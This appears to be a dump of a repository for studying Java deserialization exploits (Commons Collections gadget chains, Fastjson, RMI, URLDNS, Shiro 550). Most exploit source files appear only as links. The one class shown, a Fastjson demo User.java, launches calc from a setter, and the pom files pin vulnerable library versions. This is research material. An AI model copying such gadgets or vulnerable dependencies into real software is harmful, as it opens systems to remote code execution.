├── CommonsCollections1
├── .idea
│ ├── .gitignore
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── CommonsCollections1.iml
├── out
│ └── production
│ │ └── CommonsCollections1
│ │ ├── LazyMapExploit.class
│ │ └── TransformedMapExploit.class
└── src
│ ├── LazyMapExploit.java
│ └── TransformedMapExploit.java
├── CommonsCollections11
├── .idea
│ ├── .gitignore
│ ├── compiler.xml
│ ├── jarRepositories.xml
│ ├── misc.xml
│ └── vcs.xml
├── CommonsCollections11.iml
├── pom.xml
├── src
│ └── main
│ │ └── java
│ │ ├── CommonsCollections11.java
│ │ └── cc11.java
└── target
│ └── classes
│ ├── CommonsCollections11.class
│ └── cc11.class
├── CommonsCollections2
├── .idea
│ ├── .gitignore
│ ├── libraries
│ │ ├── commons_collections4_4_0.xml
│ │ └── javassist_3_25_0_GA.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── CommonsCollections2.iml
├── out
│ └── production
│ │ └── CommonsCollections2
│ │ ├── CommonsCollections2.class
│ │ └── CommonsCollections2Method2.class
└── src
│ ├── CommonsCollections2.java
│ └── CommonsCollections2Method2.java
├── CommonsCollections3
├── .idea
│ ├── .gitignore
│ ├── compiler.xml
│ ├── libraries
│ │ ├── commons_collections_3_1.xml
│ │ └── javassist_3_25_0_GA.xml
│ ├── misc.xml
│ ├── modules.xml
│ ├── uiDesigner.xml
│ └── vcs.xml
├── CommonsCollections3.iml
├── out
│ └── production
│ │ └── CommonsCollections3
│ │ ├── CommonsCollections3.class
│ │ ├── CommonsCollections3Method2.class
│ │ ├── CommonsCollectionsShiro.class
│ │ └── client.class
└── src
│ ├── CommonsCollections3.java
│ └── CommonsCollections3Method2.java
├── CommonsCollections4
├── .idea
│ ├── .gitignore
│ ├── libraries
│ │ ├── commons_collections4_4_0.xml
│ │ └── javassist_3_25_0_GA.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── CommonsCollections4.iml
├── out
│ └── production
│ │ └── CommonsCollections4
│ │ ├── CommonsCollections4.class
│ │ └── CommonsCollections4Method2.class
└── src
│ ├── CommonsCollections4.java
│ └── CommonsCollections4Method2.java
├── CommonsCollections5
├── .idea
│ ├── .gitignore
│ ├── libraries
│ │ └── commons_collections_3_1.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── CommonsCollections5.iml
└── src
│ └── CommonsCollections5.java
├── CommonsCollections6
├── .idea
│ ├── .gitignore
│ ├── libraries
│ │ └── commons_collections_3_1.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── CommonsCollections6.iml
├── out
│ └── production
│ │ └── CommonsCollections6
│ │ ├── CommonsCollections6.class
│ │ └── CommonsCollections6Method2.class
└── src
│ ├── CommonsCollections6.java
│ └── CommonsCollections6Method2.java
├── CommonsCollections7
├── .idea
│ ├── .gitignore
│ ├── libraries
│ │ └── commons_collections_3_1.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── CommonsCollections7.iml
├── out
│ └── production
│ │ └── CommonsCollections7
│ │ └── CommonsCollections7.class
└── src
│ └── CommonsCollections7.java
├── FastJasonPOC
├── .idea
│ ├── .gitignore
│ ├── .name
│ ├── compiler.xml
│ ├── jarRepositories.xml
│ ├── misc.xml
│ ├── uiDesigner.xml
│ └── vcs.xml
├── FastJasonPOC.iml
├── pom.xml
├── src
│ └── main
│ │ └── java
│ │ ├── EvilClass.java
│ │ └── User.java
└── target
│ └── classes
│ ├── EvilClass.class
│ └── User.class
├── README.md
├── RMI_Codebase
├── .idea
│ ├── .gitignore
│ ├── encodings.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── RMI_Codebase.iml
├── out
│ └── production
│ │ └── RMI_Codebase
│ │ ├── Calc.class
│ │ ├── ICalc.class
│ │ ├── RMIClient$Payload.class
│ │ ├── RMIClient.class
│ │ ├── RemoteRMIServer.class
│ │ └── client.policy
└── src
│ ├── Calc.java
│ ├── ICalc.java
│ ├── RMIClient.java
│ ├── RemoteRMIServer.java
│ └── client.policy
├── URLDNS
├── .idea
│ ├── .gitignore
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── URLDNS.iml
├── out.bin
├── out
│ └── production
│ │ └── URLDNS
│ │ └── URLDNS.class
└── src
│ └── URLDNS.java
└── shiro550
├── .idea
├── .gitignore
├── misc.xml
├── modules.xml
└── vcs.xml
├── out
└── production
│ └── shiro550
│ └── shiro550.class
├── shiro550.iml
└── src
└── shiro550.java
/CommonsCollections1/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections1\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections1/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections1/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/CommonsCollections1/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections1/CommonsCollections1.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/CommonsCollections1/out/production/CommonsCollections1/LazyMapExploit.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections1/out/production/CommonsCollections1/LazyMapExploit.class
--------------------------------------------------------------------------------
/CommonsCollections1/out/production/CommonsCollections1/TransformedMapExploit.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections1/out/production/CommonsCollections1/TransformedMapExploit.class
--------------------------------------------------------------------------------
/CommonsCollections1/src/LazyMapExploit.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections1/src/LazyMapExploit.java
--------------------------------------------------------------------------------
/CommonsCollections1/src/TransformedMapExploit.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections1/src/TransformedMapExploit.java
--------------------------------------------------------------------------------
/CommonsCollections11/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections11\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections11/.idea/compiler.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
--------------------------------------------------------------------------------
/CommonsCollections11/.idea/jarRepositories.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/CommonsCollections11/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/CommonsCollections11/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections11/CommonsCollections11.iml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/CommonsCollections11/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | org.example
8 | CommonsCollections11
9 | 1.0-SNAPSHOT
10 |
11 |
12 | commons-collections
13 | commons-collections
14 | 3.1
15 |
16 |
17 | org.javassist
18 | javassist
19 | 3.19.0-GA
20 |
21 |
22 |
23 |
--------------------------------------------------------------------------------
/CommonsCollections11/src/main/java/CommonsCollections11.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections11/src/main/java/CommonsCollections11.java
--------------------------------------------------------------------------------
/CommonsCollections11/src/main/java/cc11.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections11/src/main/java/cc11.java
--------------------------------------------------------------------------------
/CommonsCollections11/target/classes/CommonsCollections11.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections11/target/classes/CommonsCollections11.class
--------------------------------------------------------------------------------
/CommonsCollections11/target/classes/cc11.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections11/target/classes/cc11.class
--------------------------------------------------------------------------------
/CommonsCollections2/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections2\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections2/.idea/libraries/commons_collections4_4_0.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/CommonsCollections2/.idea/libraries/javassist_3_25_0_GA.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/CommonsCollections2/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections2/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/CommonsCollections2/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections2/CommonsCollections2.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
--------------------------------------------------------------------------------
/CommonsCollections2/out/production/CommonsCollections2/CommonsCollections2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections2/out/production/CommonsCollections2/CommonsCollections2.class
--------------------------------------------------------------------------------
/CommonsCollections2/out/production/CommonsCollections2/CommonsCollections2Method2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections2/out/production/CommonsCollections2/CommonsCollections2Method2.class
--------------------------------------------------------------------------------
/CommonsCollections2/src/CommonsCollections2.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections2/src/CommonsCollections2.java
--------------------------------------------------------------------------------
/CommonsCollections2/src/CommonsCollections2Method2.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections2/src/CommonsCollections2Method2.java
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections3\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/compiler.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/libraries/commons_collections_3_1.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/libraries/javassist_3_25_0_GA.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/uiDesigner.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | -
6 |
7 |
8 | -
9 |
10 |
11 | -
12 |
13 |
14 | -
15 |
16 |
17 | -
18 |
19 |
20 |
21 |
22 |
23 | -
24 |
25 |
26 |
27 |
28 |
29 | -
30 |
31 |
32 |
33 |
34 |
35 | -
36 |
37 |
38 |
39 |
40 |
41 | -
42 |
43 |
44 |
45 |
46 | -
47 |
48 |
49 |
50 |
51 | -
52 |
53 |
54 |
55 |
56 | -
57 |
58 |
59 |
60 |
61 | -
62 |
63 |
64 |
65 |
66 | -
67 |
68 |
69 |
70 |
71 | -
72 |
73 |
74 | -
75 |
76 |
77 |
78 |
79 | -
80 |
81 |
82 |
83 |
84 | -
85 |
86 |
87 |
88 |
89 | -
90 |
91 |
92 |
93 |
94 | -
95 |
96 |
97 |
98 |
99 | -
100 |
101 |
102 | -
103 |
104 |
105 | -
106 |
107 |
108 | -
109 |
110 |
111 | -
112 |
113 |
114 |
115 |
116 | -
117 |
118 |
119 | -
120 |
121 |
122 |
123 |
124 |
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections3/CommonsCollections3.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
--------------------------------------------------------------------------------
/CommonsCollections3/out/production/CommonsCollections3/CommonsCollections3.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections3/out/production/CommonsCollections3/CommonsCollections3.class
--------------------------------------------------------------------------------
/CommonsCollections3/out/production/CommonsCollections3/CommonsCollections3Method2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections3/out/production/CommonsCollections3/CommonsCollections3Method2.class
--------------------------------------------------------------------------------
/CommonsCollections3/out/production/CommonsCollections3/CommonsCollectionsShiro.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections3/out/production/CommonsCollections3/CommonsCollectionsShiro.class
--------------------------------------------------------------------------------
/CommonsCollections3/out/production/CommonsCollections3/client.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections3/out/production/CommonsCollections3/client.class
--------------------------------------------------------------------------------
/CommonsCollections3/src/CommonsCollections3.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections3/src/CommonsCollections3.java
--------------------------------------------------------------------------------
/CommonsCollections3/src/CommonsCollections3Method2.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections3/src/CommonsCollections3Method2.java
--------------------------------------------------------------------------------
/CommonsCollections4/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections4\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections4/.idea/libraries/commons_collections4_4_0.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/CommonsCollections4/.idea/libraries/javassist_3_25_0_GA.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/CommonsCollections4/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections4/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/CommonsCollections4/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections4/CommonsCollections4.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
--------------------------------------------------------------------------------
/CommonsCollections4/out/production/CommonsCollections4/CommonsCollections4.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections4/out/production/CommonsCollections4/CommonsCollections4.class
--------------------------------------------------------------------------------
/CommonsCollections4/out/production/CommonsCollections4/CommonsCollections4Method2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections4/out/production/CommonsCollections4/CommonsCollections4Method2.class
--------------------------------------------------------------------------------
/CommonsCollections4/src/CommonsCollections4.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections4/src/CommonsCollections4.java
--------------------------------------------------------------------------------
/CommonsCollections4/src/CommonsCollections4Method2.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections4/src/CommonsCollections4Method2.java
--------------------------------------------------------------------------------
/CommonsCollections5/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections5\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections5/.idea/libraries/commons_collections_3_1.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/CommonsCollections5/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections5/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/CommonsCollections5/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections5/CommonsCollections5.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/CommonsCollections5/src/CommonsCollections5.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections5/src/CommonsCollections5.java
--------------------------------------------------------------------------------
/CommonsCollections6/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections6\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections6/.idea/libraries/commons_collections_3_1.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/CommonsCollections6/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections6/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/CommonsCollections6/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections6/CommonsCollections6.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/CommonsCollections6/out/production/CommonsCollections6/CommonsCollections6.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections6/out/production/CommonsCollections6/CommonsCollections6.class
--------------------------------------------------------------------------------
/CommonsCollections6/out/production/CommonsCollections6/CommonsCollections6Method2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections6/out/production/CommonsCollections6/CommonsCollections6Method2.class
--------------------------------------------------------------------------------
/CommonsCollections6/src/CommonsCollections6.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections6/src/CommonsCollections6.java
--------------------------------------------------------------------------------
/CommonsCollections6/src/CommonsCollections6Method2.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections6/src/CommonsCollections6Method2.java
--------------------------------------------------------------------------------
/CommonsCollections7/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections7\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections7/.idea/libraries/commons_collections_3_1.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/CommonsCollections7/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections7/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/CommonsCollections7/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CommonsCollections7/CommonsCollections7.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/CommonsCollections7/out/production/CommonsCollections7/CommonsCollections7.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections7/out/production/CommonsCollections7/CommonsCollections7.class
--------------------------------------------------------------------------------
/CommonsCollections7/src/CommonsCollections7.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections7/src/CommonsCollections7.java
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\FastJasonTempl\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/.name:
--------------------------------------------------------------------------------
1 | FastJasonPOC
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/compiler.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/jarRepositories.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/uiDesigner.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | -
6 |
7 |
8 | -
9 |
10 |
11 | -
12 |
13 |
14 | -
15 |
16 |
17 | -
18 |
19 |
20 |
21 |
22 |
23 | -
24 |
25 |
26 |
27 |
28 |
29 | -
30 |
31 |
32 |
33 |
34 |
35 | -
36 |
37 |
38 |
39 |
40 |
41 | -
42 |
43 |
44 |
45 |
46 | -
47 |
48 |
49 |
50 |
51 | -
52 |
53 |
54 |
55 |
56 | -
57 |
58 |
59 |
60 |
61 | -
62 |
63 |
64 |
65 |
66 | -
67 |
68 |
69 |
70 |
71 | -
72 |
73 |
74 | -
75 |
76 |
77 |
78 |
79 | -
80 |
81 |
82 |
83 |
84 | -
85 |
86 |
87 |
88 |
89 | -
90 |
91 |
92 |
93 |
94 | -
95 |
96 |
97 |
98 |
99 | -
100 |
101 |
102 | -
103 |
104 |
105 | -
106 |
107 |
108 | -
109 |
110 |
111 | -
112 |
113 |
114 |
115 |
116 | -
117 |
118 |
119 | -
120 |
121 |
122 |
123 |
124 |
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/FastJasonPOC/FastJasonPOC.iml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/FastJasonPOC/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | org.example
8 | FastJasonTempl
9 | 1.0-SNAPSHOT
10 |
11 |
12 |
13 | com.alibaba
14 | fastjson
15 | 1.2.44
16 |
17 |
18 | org.javassist
19 | javassist
20 | 3.19.0-GA
21 |
22 |
23 |
24 |
--------------------------------------------------------------------------------
/FastJasonPOC/src/main/java/EvilClass.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/FastJasonPOC/src/main/java/EvilClass.java
--------------------------------------------------------------------------------
/FastJasonPOC/src/main/java/User.java:
--------------------------------------------------------------------------------
1 | import java.io.IOException;
2 |
3 | public class User {
4 | String name;
5 |
6 | public User(){
7 | System.out.println("constructor invoked");
8 |
9 | }
10 | public String getName() {
11 | System.out.println("get name");
12 | return name;
13 | }
14 |
15 | public void setName(String name) throws IOException {
16 | System.out.println("set name");
17 | Runtime.getRuntime().exec("calc");
18 | this.name = name;
19 | }
20 |
21 | @Override
22 | public String toString() {
23 | return "User{" +
24 | "name='" + name + '\'' +
25 | '}';
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/FastJasonPOC/target/classes/EvilClass.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/FastJasonPOC/target/classes/EvilClass.class
--------------------------------------------------------------------------------
/FastJasonPOC/target/classes/User.class:
--------------------------------------------------------------------------------
